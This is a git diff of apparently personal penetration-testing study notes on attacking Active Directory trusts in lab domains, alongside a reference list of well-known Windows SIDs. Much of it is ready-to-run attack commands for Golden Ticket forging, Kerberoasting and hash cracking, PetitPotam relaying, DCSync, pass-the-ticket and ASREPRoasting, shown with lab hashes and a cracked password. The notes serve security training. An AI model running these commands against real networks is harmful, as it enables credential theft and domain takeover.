`S-1-5-21-3842939050-3880317879-2865463114-519` + +Before the attack, we can confirm no access to the file system of the DC in the parent domain: + +```powershell +# List C: in the parent domain: +ls \\$parenhostname.$domain\c$ +# Example: +# ls \\academy-ea-dc01.inlanefreight.local\c$ +``` + +Using Mimikatz and the data listed above, we can create a Golden Ticket to access all resources within the parent domain. + +```powershell +kerberos::golden /user:$madeupUserName /domain:$targetedFQDN /sid:$sidTargetedDomain /krbtgt:$NTLMhashOfKRBTGTaccountDomain /sids:$SIDofEnterpriseAdminGroup /ptt + +# Example: +# kerberos::golden /user:hacker /domain:LOGISTICS.INLANEFREIGHT.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689 /krbtgt:9d765b482771505cbe97411065964d5f /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /ptt +``` + +Now, let's list the kerberos tickets in memory: + +```powershell +klist +``` + +Now we can perform actions in the parent domain, such as reading a flag: + +```powershell +# List C: in the parent domain: +ls \\$parenhostname.$domain\c$ +# Example: +# ls \\academy-ea-dc01.inlanefreight.local\c$ + +# Read the flag +cat \\$parenhostname.$domain\c$path\to\file.txt +# Example: +# cat \\academy-ea-dc01.inlanefreight.local\c$\ExtraSids\flag.txt +``` + +### Cross-Forest Kerberoasting + + Sometimes you cannot escalate privileges in your current domain, but instead can obtain a Kerberos ticket and crack a hash for an administrative user in another domain that has Domain/Enterprise Admin privileges in both domains. + +#### Enumerating SPNs + +Enumerating Accounts for Associated SPNs Using Get-DomainUser: + +```powershell +Get-DomainUser -SPN -Domain $TargetDomain | select SamAccountName +# Example: +# Get-DomainUser -SPN -Domain FREIGHTLOGISTICS.LOCAL | select SamAccountName + +``` + +Results: + +``` +samaccountname +-------------- +krbtgt +mssqlsvc +``` + +There is one account with an SPN in the target domain. + +#### Getting which groups is SPM member of + +A quick check shows that this account is a member of the Domain Admins group in the target domain. + +```powershell +Get-DomainUser -Domain $TargetDomain -Identity $interestingUserSamAccountName | select samaccountname,memberof +# Example: +# Get-DomainUser -Domain FREIGHTLOGISTICS.LOCAL -Identity mssqlsvc | select samaccountname,memberof +``` + + +#### Performing a Kerberoasting Attacking with Rubeus Using /domain Flag + +```powershell +.\Rubeus.exe kerberoast /domain:$TargetDomain /user:$interestingUserSamAccountName /nowrap +# Example: +# .\Rubeus.exe kerberoast /domain:FREIGHTLOGISTICS.LOCAL /user:mssqlsvc /nowrap +``` + +When getting the kerberos ticket, we can crack it: + + +```shell-session +hashcat -m 13100 ticketTocrack /usr/share/wordlists/rockyou.txt +# Results: 1logistics +``` + + +### Admin Password Re-Use & Group Membership + +From time to time, we'll run into a situation where there is a bidirectional forest trust managed by admins from the same company. We may see a Domain Admin or Enterprise Admin from Domain A as a member of the built-in Administrators group in Domain B in a bidirectional forest trust relationship. If we can take over this admin user in Domain A, we would gain full administrative access to Domain B based on group membership. + +#### Using Get-DomainForeignGroupMember + +For instance, the `FREIGHTLOGISTICS.LOCAL` domain with which we have an external bidirectional forest trust. + +```powershell +Get-DomainForeignGroupMember -Domain $targeteddomain +# Example: +# Get-DomainForeignGroupMember -Domain FREIGHTLOGISTICS.LOCAL +``` + +Results: +``` +GroupDomain : FREIGHTLOGISTICS.LOCAL +GroupName : Administrators +GroupDistinguishedName : CN=Administrators,CN=Builtin,DC=FREIGHTLOGISTICS,DC=LOCAL +MemberDomain : FREIGHTLOGISTICS.LOCAL +MemberName : S-1-5-21-3842939050-3880317879-2865463114-500 +MemberDistinguishedName : CN=S-1-5-21-3842939050-3880317879-2865463114-500,CN=ForeignSecurityPrincipals,DC=FREIGHTLOGIS + TICS,DC=LOCAL +``` + +If we convert the SID to name: +```powershell +Convert-SidToName S-1-5-21-3842939050-3880317879-2865463114-500 +# Results: INLANEFREIGHT\administrator +``` + +Meaning that the built-in Administrators group in `FREIGHTLOGISTICS.LOCAL` has the built-in Administrator account for the `INLANEFREIGHT.LOCAL` domain as a member. + +#### Accessing DC03 Using Enter-PSSession + +```powershell +Enter-PSSession -ComputerName $hostname.$targeteddomain -Credential $ParentDomain\administrator +# Example: +# Enter-PSSession -ComputerName ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL -Credential INLANEFREIGHT\administrator +# From the command output above, we can see that we successfully authenticated to the Domain Controller in the `FREIGHTLOGISTICS.LOCAL` domain using the Administrator account from the `INLANEFREIGHT.LOCAL` domain + +``` + +### SID History Abuse - Cross Forest + +SID History can also be abused across a forest trust. If a user is migrated from one forest to another and SID Filtering is not enabled, it becomes possible to add a SID from the other forest. + +If the SID of an account with administrative privileges in Forest A is added to the SID history attribute of an account in Forest B, assuming they can authenticate across the forest, then this account will have administrative privileges when accessing resources in the partner forest. + + ## Evasion Techniques #### Downgrade Powershell diff --git a/docs/active-directory-security-identifiers.md b/docs/active-directory-security-identifiers.md new file mode 100644 index 000000000..495d4e5ca --- /dev/null +++ b/docs/active-directory-security-identifiers.md @@ -0,0 +1,215 @@ +--- +title: Interesting Windows Computer & Active Directory Well-Known Security Identifiers - SIDs +author: amandaguglieri +draft: false +TableOfContents: true +tags: + - active + - directory +--- +# Interesting Windows Computer & Active Directory Well-Known Security Identifiers (SIDs) +Source: [https://adsecurity.org/?p=1001](https://adsecurity.org/?p=1001) + +##### The [Microsoft Knowledge Base article KB243330 lists the well-known security identifiers in Windows operating systems](http://support.microsoft.com/KB/243330)  + +Listed here are the more interesting ones from the article as well as some additional ones. + +#### **Local Computer SIDs +** + +> SID: S-1-5-2 +> Name: Network +> Description: A group that includes all users that have logged on through a network connection. Membership is controlled by the operating system. +> +> SID: S-1-5-6 +> Name: Service +> Description: A group that includes all security principals that have logged on as a service. Membership is controlled by the operating system. +> +> SID: S-1-5-9 +> Name: Enterprise Domain Controllers +> Description: A group that includes all domain controllers in a forest that uses an Active Directory directory service. Membership is controlled by the operating system. +> +> SID: S-1-5-11 +> Name: Authenticated Users +> Description: A group that includes all users whose identities were authenticated when they logged on. Membership is controlled by the operating system. +> +> SID: S-1-5-18 +> Name: Local System +> Description: A service account that is used by the operating system. +> +> SID: S-1-5-19 +> Name: NT Authority +> Description: Local Service +> +> SID: S-1-5-20 +> Name: NT Authority +> Description: Network Service + +#### **New Local Computer SIDs in Windows 8.1, Windows 2012 R2, and earlier operating systems ([with KB2871997](https://adsecurity.org/?p=559 "Microsoft KB2871997: Back-Porting Windows 8.1/Win2012R2 Enhanced Security & Pass The Hash Mitigation to Windows 7, Windows 8, & Windows 2008R2")):** + +> LOCAL_ACCOUNT (S-1-5-113) – any local account +> LOCAL_ACCOUNT_AND_MEMBER_OF_ADMINISTRATORS_GROUP (S-1-5-114) + +#### **Active Directory Domain SIDs’ + +** + +> SID: S-1-5-21-500 +> Name: Administrator +> Description: A user account for the system administrator. By default, it is the only user account that is given full control over the system. +> +> SID: S-1-5-21-501 +> Name: Guest +> Description: A user account for people who do not have individual accounts. This user account does not require a password. By default, the Guest account is disabled. +> +> SID: S-1-5-21-502 +> Name: KRBTGT +> Description: A service account that is used by the Key Distribution Center (KDC) service. +> +> SID: S-1-5-21-512 +> Name: Domain Admins +> Description: A global group whose members are authorized to administer the domain. By default, the Domain Admins group is a member of the Administrators group on all computers that have joined a domain, including the domain controllers. Domain Admins is the default owner of any object that is created by any member of the group. +> +> SID: S-1-5-21-513 +> Name: Domain Users +> Description: A global group that, by default, includes all user accounts in a domain. When you create a user account in a domain, it is added to this group by default. +> +> SID: S-1-5-21-514 +> Name: Domain Guests +> Description: A global group that, by default, has only one member, the domain’s built-in Guest account. +> +> SID: S-1-5-21-515 +> Name: Domain Computers +> Description: A global group that includes all clients and servers that have joined the domain. +> +> SID: S-1-5-21-516 +> Name: Domain Controllers +> Description: A global group that includes all domain controllers in the domain. New domain controllers are added to this group by default. +> +> SID: S-1-5- 21-498 +> Name: Enterprise Read-only Domain Controllers +> Description: A Universal group. Members of this group are Read-Only Domain Controllers in the enterprise +> _New with Windows Server 2008 Active Directory schema (or newer)_ +> +> SID: S-1-5- 21-521 +> Name: Read-only Domain Controllers +> Description: A Global group. Members of this group are Read-Only Domain Controllers in the domain +> _New with Windows Server 2008 Active Directory schema (or newer)_ +> +> SID: S-1-5-21-517 +> Name: Cert Publishers +> Description: A global group that includes all computers that are running an enterprise certification authority. Cert Publishers are authorized to publish certificates for User objects in Active Directory. +> +> SID: S-1-5-21-518 +> Name: Schema Admins +> Description: A universal group in a native-mode domain; a global group in a mixed-mode domain. The group is authorized to make schema changes in Active Directory. By default, the only member of the group is the Administrator account for the forest root domain. +> +> SID: S-1-5-21-519 +> Name: Enterprise Admins +> Description: A universal group in a native-mode domain; a global group in a mixed-mode domain. The group is authorized to make forest-wide changes in Active Directory, such as adding child domains. By default, the only member of the group is the Administrator account for the forest root domain. +> +> SID: S-1-5-21-520 +> Name: Group Policy Creator Owners +> Description: A global group that is authorized to create new Group Policy objects in Active Directory. By default, the only member of the group is Administrator. +> +> SID: S-1-5-32-544 +> Name: Administrators +> Description: A built-in group. After the initial installation of the operating system, the only member of the group is the Administrator account. When a computer joins a domain, the Domain Admins group is added to the Administrators group. When a server becomes a domain controller, the Enterprise Admins group also is added to the Administrators group. +> +> SID: S-1-5-32-545 +> Name: Users +> Description: A built-in group. After the initial installation of the operating system, the only member is the Authenticated Users group. When a computer joins a domain, the Domain Users group is added to the Users group on the computer. +> +> SID: S-1-5-32-546 +> Name: Guests +> Description: A built-in group. By default, the only member is the Guest account. The Guests group allows occasional or one-time users to log on with limited privileges to a computer’s built-in Guest account. +> +> SID: S-1-5-32-548 +> Name: Account Operators +> Description: A built-in group that exists only on domain controllers. By default, the group has no members. By default, Account Operators have permission to create, modify, and delete accounts for users, groups, and computers in all containers and organizational units of Active Directory except the Builtin container and the Domain Controllers OU. Account Operators do not have permission to modify the Administrators and Domain Admins groups, nor do they have permission to modify the accounts for members of those groups. +> +> SID: S-1-5-32-549 +> Name: Server Operators +> Description: A built-in group that exists only on domain controllers. By default, the group has no members. Server Operators can log on to a server interactively; create and delete network shares; start and stop services; back up and restore files; format the hard disk of the computer; and shut down the computer. +> +> SID: S-1-5-32-550 +> Name: Print Operators +> Description: A built-in group that exists only on domain controllers. By default, the only member is the Domain Users group. Print Operators can manage printers and document queues. +> +> SID: S-1-5-32-551 +> Name: Backup Operators +> Description: A built-in group. By default, the group has no members. Backup Operators can back up and restore all files on a computer, regardless of the permissions that protect those files. Backup Operators also can log on to the computer and shut it down. +> +> SID: S-1-5-32-552 +> Name: Replicators +> Description: A built-in group that is used by the File Replication service on domain controllers. By default, the group has no members. Do not add users to this group +> +> SID: S-1-5-32-557 +> Name: BUILTIN\Incoming Forest Trust Builders +> Description: An alias. Members of this group can create incoming, one-way trusts to this forest. +> +> SID: S-1-5-32-569 +> Name: BUILTIN\Cryptographic Operators +> Description: A Builtin Local group. Members are authorized to perform cryptographic operations. +> _New with Windows Server 2008 Active Directory schema (or newer)_ +> +> SID: S-1-5-21-571 +> Name: Allowed RODC Password Replication Group +> Description: A Domain Local group. Members in this group can have their passwords replicated to all read-only domain controllers in the domain. +> _New with Windows Server 2008 Active Directory schema (or newer)_ +> +> SID: S-1-5-21-572 +> Name: Denied RODC Password Replication Group +> Description: A Domain Local group. Members in this group cannot have their passwords replicated to any read-only domain controllers in the domain +> _New with Windows Server 2008 Active Directory schema (or newer)_ +> +> SID: S-1-5-32-573 +> Name: BUILTIN\Event Log Readers +> Description: A Builtin Local group. Members of this group can read event logs from local machine. +> _New with Windows Server 2008 Active Directory schema (or newer)_ +> +> SID: S-1-5-32-574 +> Name: BUILTIN\Certificate Service DCOM Access +> Description: A Builtin Local group. Members of this group are allowed to connect to Certification Authorities in the enterprise. +> _New with Windows Server 2008 Active Directory schema (or newer)_ +> +> SID: S-1-5-21-–522 +> Name: Cloneable Domain Controllers +> Description: A Global group. Members of this group that are domain controllers may be cloned. +> _New with Windows Server 2012 Active Directory schema (or newer)_ +> +> SID: S-1-5-32-578 +> Name: BUILTIN\Hyper-V Administrators +> Description: A Builtin Local group. Members of this group have complete and unrestricted access to all features of Hyper-V. +> _New with Windows Server 2012 Active Directory schema (or newer)_ +> +> SID: S-1-5-32-579 +> Name: BUILTIN\Access Control Assistance Operators +> Description: A Builtin Local group. Members of this group can remotely query authorization attributes and permissions for resources on this computer. +> _New with Windows Server 2012 Active Directory schema (or newer)_ +> +> SID: S-1-5-32-580 +> Name: BUILTIN\Remote Management Users +> Description: A Builtin Local group. Members of this group can access WMI resources over management protocols (such as WS-Management via the Windows Remote Management service). This applies only to WMI namespaces that grant access to the user. +> _New with Windows Server 2012 Active Directory schema (or newer)_ +> +> SID: S-1-5-64-10 +> Name: NTLM Authentication +> Description: A SID that is used when the NTLM authentication package authenticated the client +> +> SID: S-1-5-64-14 +> Name: SChannel Authentication +> Description: A SID that is used when the SChannel authentication package authenticated the client. +> +> SID: S-1-5-64-21 +> Name: Digest Authentication +> Description: A SID that is used when the Digest authentication package authenticated the client. +> +> SID: S-1-5-80 +> Name: NT Service +> Description: An NT Service account prefix +> +> SID: S-1-5-80-0 +> NT SERVICES\ALL SERVICES +> Name: All Services +> Description: A group that includes all service processes that are configured on the system. Membership is controlled by the operating system. \ No newline at end of file diff --git a/docs/active-directory.md b/docs/active-directory.md index b7e0b399c..e8fed81a9 100644 --- a/docs/active-directory.md +++ b/docs/active-directory.md @@ -108,3 +108,33 @@ tags: |[ADRecon](https://github.com/adrecon/ADRecon)|A tool used to extract various data from a target AD environment. The data can be output in Microsoft Excel format with summary views and analysis to assist with analysis and paint a picture of the environment's overall security state.| +## Domain Trust Overview + +A trust creates a link between the authentication systems of two domains and may allow either one-way or two-way (bidirectional) communication. + +Types of trusts: + +- `Parent-child`: Two or more domains within the same forest. The child domain has a two-way transitive trust with the parent domain, meaning that users in the child domain `corp.inlanefreight.local` could authenticate into the parent domain `inlanefreight.local`, and vice-versa. +- `Cross-link`: A trust between child domains to speed up authentication. +- `External`: A non-transitive trust between two separate domains in separate forests which are not already joined by a forest trust. This type of trust utilizes [SID filtering](https://www.serverbrain.org/active-directory-2008/sid-history-and-sid-filtering.html) or filters out authentication requests (by SID) not from the trusted domain. +- `Tree-root`: A two-way transitive trust between a forest root domain and a new tree root domain. They are created by design when you set up a new tree root domain within a forest. +- `Forest`: A transitive trust between two forest root domains. +- [ESAE](https://docs.microsoft.com/en-us/security/compass/esae-retirement): A bastion forest used to manage Active Directory. + + +Trusts can be transitive or non-transitive: + +- A `transitive` trust means that trust is extended to objects that the child domain trusts: + - Shared, 1 to many. + - The trust is shared with anyone in the forest. + - Forest, tree-root, parent-child, and cross-link trusts are transitive. +- In a non-transitive trust, the child domain itself is the only one trusted: + - Direct trust. + - Not extended to the next level child domains. + - Typical for external or custom trust setup. + + +Trusts can be set up in two directions: one-way or two-way (bidirectional): + +- - `One-way trust`: Users in a `trusted` domain can access resources in a trusting domain, not vice-versa. +- `Bidirectional trust`: Users from both trusting domains can access resources in the other domain. diff --git a/docs/activedirectory-powershell-module.md b/docs/activedirectory-powershell-module.md index 2841c22a1..b903e7ab6 100644 --- a/docs/activedirectory-powershell-module.md +++ b/docs/activedirectory-powershell-module.md @@ -20,9 +20,13 @@ The Active Directory module for Windows PowerShell is a PowerShell module that c Download from [The ActiveDirectory PowerShell module github repository](https://github.com/samratashok/ADModule ) +```powershell +Import-Module activedirectory +``` + This module is Microsoft signed and works even in PowerShell Constrained Language Mode (CLM). -```ps +```powershell Import-Module .\ADModule-master\Microsoft.ActiveDirectory.Management.dll  Import-Module .\ADModule-master\ActiveDirectory\ActiveDirectory.psd1  @@ -30,11 +34,13 @@ Import-Module .\ADModule-master\ActiveDirectory\ActiveDirectory.psd1  Also, you can copy the DLL from the github repo to your machine and use it to enumerate Active Directory without installing RSAT and without having administrative privileges. -```ps +```powershell Import-Module C:\ADModule\Microsoft.ActiveDirectory.Management.dll -Verbose ``` + + ## Basic commands ```powershell diff --git a/docs/bloodhound.md b/docs/bloodhound.md index c32947257..fd69dc748 100644 --- a/docs/bloodhound.md +++ b/docs/bloodhound.md @@ -108,3 +108,9 @@ Enumerate via Bloodhound and the `SQLAdmin` edge. We can check for `SQL Admin ```cypher MATCH p1=shortestPath((u1:User)-[r1:MemberOf*1..]->(g1:Group)) MATCH p2=(u1)-[:SQLAdmin*1..]->(c:Computer) RETURN p2 ``` + + +### Visualizing Trust Relationships in BloodHound + +![](img/blood02.png) + diff --git a/docs/cpts-cheat-sheet.md b/docs/cpts-cheat-sheet.md index 206592391..ddb360be0 100644 --- a/docs/cpts-cheat-sheet.md +++ b/docs/cpts-cheat-sheet.md @@ -1193,18 +1193,18 @@ By leveraging the Wayback Machine, you can gain a historical perspective on your ### PetitPotam -|Command|Description| -|---|---| -|`sudo ntlmrelayx.py -debug -smb2support --target http://ACADEMY-EA-CA01.INLANEFREIGHT.LOCAL/certsrv/certfnsh.asp --adcs --template DomainController`|Impacket tool used to create an `NTLM relay` by specifiying the web enrollment URL for the `Certificate Authority` host. Perfomred from a Linux-based host.| -|`git clone https://github.com/topotam/PetitPotam.git`|Used to clone the `PetitPotam` exploit using git. Performed from a Linux-based host.| -|`python3 PetitPotam.py 172.16.5.225 172.16.5.5`|Used to execute the PetitPotam exploit by specifying the IP address of the attack host (`172.16.5.255`) and the target Domain Controller (`172.16.5.5`). Performed from a Linux-based host.| -|`python3 /opt/PKINITtools/gettgtpkinit.py INLANEFREIGHT.LOCAL/ACADEMY-EA-DC01\$ -pfx-base64 = dc01.ccache`|Uses `gettgtpkinit`.py to request a TGT ticket for the Domain Controller (`dc01.ccache`) from a Linux-based host.| -|`secretsdump.py -just-dc-user INLANEFREIGHT/administrator -k -no-pass "ACADEMY-EA-DC01$"@ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL`|Impacket tool used to perform a DCSync attack and retrieve one or all of the `NTLM password hashes` from the target Windows domain. Performed from a Linux-based host.| -|`klist`|`krb5-user` command used to view the contents of the `ccache` file. Performed from a Linux-based host.| -|`python /opt/PKINITtools/getnthash.py -key 70f805f9c91ca91836b670447facb099b4b2b7cd5b762386b3369aa16d912275 INLANEFREIGHT.LOCAL/ACADEMY-EA-DC01$`|Used to submit TGS requests using `getnthash.py` from a Linux-based host.| -|`secretsdump.py -just-dc-user INLANEFREIGHT/administrator "ACADEMY-EA-DC01$"@172.16.5.5 -hashes aad3c435b514a4eeaad3b935b51304fe:313b6f423cd1ee07e91315b4919fb4ba`|Impacket tool used to extract hashes from `NTDS.dit` using a `DCSync attack` and a captured hash (`-hashes`). Performed from a Linux-based host.| -|`.\Rubeus.exe asktgt /user:ACADEMY-EA-DC01$ /=/ptt`|Uses Rubeus to request a TGT and perform a `pass-the-ticket attack` using the machine account (`/user:ACADEMY-EA-DC01$`) of a Windows target. Performed from a Windows-based host.| -|`mimikatz # lsadump::dcsync /user:inlanefreight\krbtgt`|Performs a DCSync attack using `Mimikatz`. Performed from a Windows-based host.| +| Command | Description | +| ------------------------------------------------------------------------------------------------------------------------------------------------------------------ | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | +| `sudo ntlmrelayx.py -debug -smb2support --target http://ACADEMY-EA-CA01.INLANEFREIGHT.LOCAL/certsrv/certfnsh.asp --adcs --template DomainController` | Impacket tool used to create an `NTLM relay` by specifiying the web enrollment URL for the `Certificate Authority` host. Perfomred from a Linux-based host. | +| `git clone https://github.com/topotam/PetitPotam.git` | Used to clone the `PetitPotam` exploit using git. Performed from a Linux-based host. | +| `python3 PetitPotam.py 172.16.5.225 172.16.5.5` | Used to execute the PetitPotam exploit by specifying the IP address of the attack host (`172.16.5.255`) and the target Domain Controller (`172.16.5.5`). Performed from a Linux-based host. | +| `python3 /opt/PKINITtools/gettgtpkinit.py INLANEFREIGHT.LOCAL/ACADEMY-EA-DC01\$ -pfx-base64 = dc01.ccache` | Uses `gettgtpkinit`.py to request a TGT ticket for the Domain Controller (`dc01.ccache`) from a Linux-based host. | +| `secretsdump.py -just-dc-user INLANEFREIGHT/administrator -k -no-pass "ACADEMY-EA-DC01$"@ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL` | Impacket tool used to perform a DCSync attack and retrieve one or all of the `NTLM password hashes` from the target Windows domain. Performed from a Linux-based host. | +| `klist` | `krb5-user` command used to view the contents of the `ccache` file. Performed from a Linux-based host. | +| `python /opt/PKINITtools/getnthash.py -key 70f805f9c91ca91836b670447facb099b4b2b7cd5b762386b3369aa16d912275 INLANEFREIGHT.LOCAL/ACADEMY-EA-DC01$` | Used to submit TGS requests using `getnthash.py` from a Linux-based host. | +| `secretsdump.py -just-dc-user INLANEFREIGHT/administrator "ACADEMY-EA-DC01$"@172.16.5.5 -hashes aad3c435b514a4eeaad3b935b51304fe:313b6f423cd1ee07e91315b4919fb4ba` | Impacket tool used to extract hashes from `NTDS.dit` using a `DCSync attack` and a captured hash (`-hashes`). Performed from a Linux-based host. | +| `.\Rubeus.exe asktgt /user:ACADEMY-EA-DC01$ /=/ptt` | Uses Rubeus to request a TGT and perform a `pass-the-ticket attack` using the machine account (`/user:ACADEMY-EA-DC01$`) of a Windows target. Performed from a Windows-based host. | +| `mimikatz # lsadump::dcsync /user:inlanefreight\krbtgt` | Performs a DCSync attack using `Mimikatz`. Performed from a Windows-based host. | ### Miscellaneous Misconfigurations @@ -1233,12 +1233,12 @@ By leveraging the Wayback Machine, you can gain a historical perspective on your ### ASREPRoasting -|Command|Description| -|---|---| -|`Get-DomainUser -PreauthNotRequired \| select samaccountname,userprincipalname,useraccountcontrol \| fl`|PowerView based tool used to search for the `DONT_REQ_PREAUTH` value across in user accounts in a target Windows domain. Performed from a Windows-based host.| -|`.\Rubeus.exe asreproast /user:mmorgan /nowrap /format:hashcat`|Uses `Rubeus` to perform an `ASEP Roasting attack` and formats the output for `Hashcat`. Performed from a Windows-based host.| -|`hashcat -m 18200 ilfreight_asrep /usr/share/wordlists/rockyou.txt`|Uses `Hashcat` to attempt to crack the captured hash using a wordlist (`rockyou.txt`). Performed from a Linux-based host.| -|`kerbrute userenum -d inlanefreight.local --dc 172.16.5.5 /opt/jsmith.txt`|Enumerates users in a target Windows domain and automatically retrieves the `AS` for any users found that don't require Kerberos pre-authentication. Performed from a Linux-based host.| +| Command | Description | +| -------------------------------------------------------------------------------------------------------- | --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | +| `Get-DomainUser -PreauthNotRequired \| select samaccountname,userprincipalname,useraccountcontrol \| fl` | PowerView based tool used to search for the `DONT_REQ_PREAUTH` value across in user accounts in a target Windows domain. Performed from a Windows-based host. | +| `.\Rubeus.exe asreproast /user:mmorgan /nowrap /format:hashcat` | Uses `Rubeus` to perform an `ASEP Roasting attack` and formats the output for `Hashcat`. Performed from a Windows-based host. | +| `hashcat -m 18200 ilfreight_asrep /usr/share/wordlists/rockyou.txt` | Uses `Hashcat` to attempt to crack the captured hash using a wordlist (`rockyou.txt`). Performed from a Linux-based host. | +| `kerbrute userenum -d inlanefreight.local --dc 172.16.5.5 /opt/jsmith.txt` | Enumerates users in a target Windows domain and automatically retrieves the `AS` for any users found that don't require Kerberos pre-authentication. Performed from a Linux-based host. | ### Trust Relationships - Child > Parent Trusts diff --git a/docs/cpts-index.md b/docs/cpts-index.md index 0c20ea653..3a5147b18 100644 --- a/docs/cpts-index.md +++ b/docs/cpts-index.md @@ -9,35 +9,35 @@ tags: # CPTS -| Number | Module | My notes | Duration | | | -| ------ | ---------------------------------------- | --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | -------- | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | --- | -| 01 | Penetration Testing Process | [Penetration Testing Process](penetration-testing-process.md) | 6 hours | Introduction | | -| 02 | Network Enumeration with Nmap | [(Almost) all about nmap](nmap.md) | 7 hours | Reconnaissance, Enumeration & Attack Planning | | -| 03 | Footprinting | [Introduction to footprinting](footprinting.md)
[Infrastructure and web enumeration](information-gathering.md)
Some services: [FTP](21-ftp.md), [SMB](137-138-139-445-smb.md), [NFS](2049-nfs-network-file-system.md), [DNS](53-dns.md), [SMTP](25-565-587-simple-mail-tranfer-protocol-smtp.md), [IMAP/POP3](110-143-993-995-imap-pop3.md),[SNMP](161-162-snmp.md), [MySQL](3306-mariadb-mysql.md), [Oracle TNS](1521-oracle-transparent-network-substrate.md), [IPMI](623-1900-intelligent-platform-management-interface-ipmi.md), [SSH](22-ssh.md), [RSYNC](873-rsync.md), [R Services](512-513-514-remote-services.md), [RDP](3389-rdp.md), [WinRM](5985-5986-winrm-windows-remote-management.md), [WMI](135-windows-management-instrumentation-wmi.md) | 2 days | Reconnaissance, Enumeration & Attack Planning | | -| 04 | Information Gathering - Web Edition | [Information Gathering - Web Edition](information-gathering.md). With tools such as [Gobuster](gobuster.md), [ffuf](ffuf.md), [Burpsuite](burpsuite.md), [Wfuzz](wfuzz.md), [feroxbuster](feroxbuster.md), [OWASP WSTG-INFO-02](OWASP/WSTG-INFO-03.md), [OWASP WSTG-INFO-02](OWASP/WSTG-INFO-03.md), [Google Dorks](google-dorks.md) More tools for recon: [finalrecon](finalrecon.md) | 7 hours | Reconnaissance, Enumeration & Attack Planning | | -| 05 | Vulnerability Assessment | [Vulnerability Assessment](vulnerability-assessment.md):
[Nessus](nessus.md), [Openvas](openvas.md) | 2 hours | Reconnaissance, Enumeration & Attack Planning | | -| 06 | File Transfer techniques | File Transfer Techniques:
[Linux](transferring-files-techniques-linux.md), [Windows](transferring-files-techniques-windows.md), [Code- netcat python php and others](transferring-files-techniques-code.md), [Bypassing file upload restrictions](webexploitation/arbitrary-file-upload.md), [File encryption](file-encryption.md), [Evading techniques when transferring files](transferring-files-evading-detection.md), [LOLbas Living off the land binaries](lolbins-lolbas-gtfobins.md) | 3 hours | Reconnaissance, Enumeration & Attack Planning | | -| 07 | Shells & Payloads | [Bind shells](bind-shells.md), [Reverse shells](reverse-shells.md), [Spawn a shell](spawn-a-shell.md), [Web shells](web-shells.md) ([Laudanum](laudanum.md) and [nishang](nishang.md)), [Windows footprinting](windows-footprinting.md), | 2 days | Reconnaissance, Enumeration & Attack Planning | | -| 08 | Using the Metasploit Framework | [Metasploit](metasploit.md), [Msfvenom](msfvenom.md) | 5 hours | Reconnaissance, Enumeration & Attack Planning | | -| 09 | Password Attacks | [Password attacks](webexploitation/password-attacks.md) | 8 hours | Exploitation & Lateral Movement | | -| 10 | Attacking Common Services | Common services: [FTP](21-ftp.md)
[SMB](137-138-139-445-smb.md) (tools: [smbclient](smbclient.md), [smbmap](smbmap.md), [rpcclient](rpcclient.md), [Samba Suite](samba-suite.md), [crackmapexec](crackmapexec.md), [impacket-smbexec](impacket-smbexec.md), [impacket-psexec](impacket-psexec.md)), Databases ([MySQL](mysql.md) and [Attacking MySQL](3306-mariadb-mysql.md), [MSSQL](mssql.md) and [Atacking MSSQL](1433-mssql.md), [log4j](log4j.md), [RDP](3389-rdp.md), [DNS](53-dns.md), [SMTP](25-565-587-simple-mail-tranfer-protocol-smtp.md), [IMAP/POP protocols](110-143-993-995-imap-pop3.md), [postfix](postfix.md), [swaks](swaks.md)
| 8 hours | Exploitation & Lateral Movement.
Machines:
- [Rabbit](https://www.youtube.com/watch?v=5nnJq_IWJog)
-  [SneakyMailer](https://0xdf.gitlab.io/2020/11/28/htb-sneakymailer.html)
- [Reel](https://0xdf.gitlab.io/2018/11/10/htb-reel.html) | | -| 11 | Pivoting, Tunneling, and Port Forwarding | [Pivoting, Tunneling, and Port Forwarding](pivoting-tunneling-portforwarding.md) | 2 days | Exploitation & Lateral Movement.
Machines:
- [Enterprise](https://app.hackthebox.com/machines/Enterprise) [IPPSec Walkthrough](https://youtube.com/watch?v=NWVJ2b0D1r8&t=2400)
- [Inception](https://app.hackthebox.com/machines/Inception) [IPPSec Walkthrough](https://youtube.com/watch?v=J2I-5xPgyXk&t=2330)
- [Reddish](https://app.hackthebox.com/machines/Reddish) [IPPSec Walkthrough](https://youtube.com/watch?v=Yp4oxoQIBAM&t=2466) | | -| 12 | Active Directory Enumeration & Attacks | [Active Directory](active-directory.md)
Enumerating from Linux, Enumerating from Windows, Attacks from Windows, Attacks from Linux, Lateral Movements from Linux, Lateral movement from Windows, Privilege Escalation from Linux, Privilege Escalation from Windows.
Tools: Powershell, Active Directory Module, | 7 days | Exploitation & Lateral Movement | | -| 13 | Using Web Proxies | [Proxies](proxies.md): [burpsuite](burpsuite.md), [zap-proxy](owasp-zap.md), [proxychains](proxychains.md) | 8 hours | Web Exploitation | | -| 14 | Attacking Web Applications with Ffuf | [ffuf](ffuf.md) | 5 hours | Web Exploitation | | -| 15 | Login Brute Forcing | | 6 hours | Web Exploitation | | -| 16 | SQL Injection Fundamentals | | 8 hours | Web Exploitation | | -| 17 | SQLMap Essentials | | 8 hours | Web Exploitation | | -| 18 | Cross-Site Scripting (XSS) | [XSS](webexploitation/cross-site-scripting-xss.md) | 6 hours | Web Exploitation | | -| 19 | File Inclusion | | 8 hours | Web Exploitation | | -| 20 | File Upload Attacks | | 8 hours | Web Exploitation | | -| 21 | Command Injections | | 6 hours | Web Exploitation | | -| 22 | Web Attacks | [Web exploitation](webexploitation/index.md) | 2 days | Web Exploitation | | -| 23 | Attacking Common Applications | | 4 days | Web Exploitation | | -| 24 | Linux Privilege Escalation | | 8 hours | Post-Exploitation | | -| 25 | Windows Privilege Escalation | | 4 days | Post-Exploitation | | -| 26 | Documentation & Reporting | | 2 days | Reporting & Capstone | | -| 27 | Attacking Enterprise Networks | | 2 days | Reporting & Capstone | | +| Number | Module | My notes | 